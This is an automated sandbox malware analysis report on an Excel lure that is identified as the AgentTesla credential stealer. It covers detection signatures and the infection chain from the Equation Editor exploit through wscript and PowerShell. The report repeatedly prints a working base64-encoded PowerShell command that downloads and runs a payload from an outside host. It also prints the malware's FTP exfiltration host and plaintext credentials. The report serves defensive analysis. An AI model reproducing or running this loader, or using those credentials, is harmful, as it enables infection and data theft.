Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Comprobante de pago.xlam.xlsx

Overview

General Information

Sample name:Comprobante de pago.xlam.xlsx
Analysis ID:1566138
MD5:ad8b92e44bd2d3703c895e34ca4e2865
SHA1:6503ab3f0a7adbeb16b389d29ed2a2c6f742bf5a
SHA256:4d6ddf9237e8dce54263bfe1df769f0c2fb6941713b7959decc1a7822e6e8e9b
Tags:xlsxuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3364 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3580 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3736 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • InstallUtil.exe (PID: 3976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: AF862061889F5B9B956E9469DCDAE773)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "biggiemma@horeca-bucuresti.ro", "Password": "e)rWKbKP8~mO"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bd2:$s1: <legacyDrawing r:id="
  • 0x1bfa:$s2: <oleObject progId="
  • 0x1c35:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.628206109.0000000002195000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            6.2.powershell.exe.72265d0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              6.2.powershell.exe.72265d0.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                6.2.powershell.exe.72265d0.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3261f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32691:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3271b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x327ad:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x32817:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32889:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3291f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x329af:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                6.2.powershell.exe.72265d0.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x2f819:$s2: GetPrivateProfileString
                • 0x2eedd:$s3: get_OSFullName
                • 0x30562:$s5: remove_Key
                • 0x30703:$s5: remove_Key
                • 0x315f0:$s6: FtpWebRequest
                • 0x32601:$s7: logins
                • 0x32b73:$s7: logins
                • 0x35884:$s7: logins
                • 0x35936:$s7: logins
                • 0x37289:$s7: logins
                • 0x364d0:$s9: 1.85 (Hash, version 2, native byte-order)
                8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 9 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.121.86.105, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cumconstraints[1].vbs

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3580, Protocol: tcp, SourceIp: 87.121.86.105, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3580, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , ProcessId: 3736, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3580, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , ProcessId: 3736, ProcessName: wscript.exe
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, QueryName: ip-api.com
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3580, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" , ProcessId: 3736, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3580, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2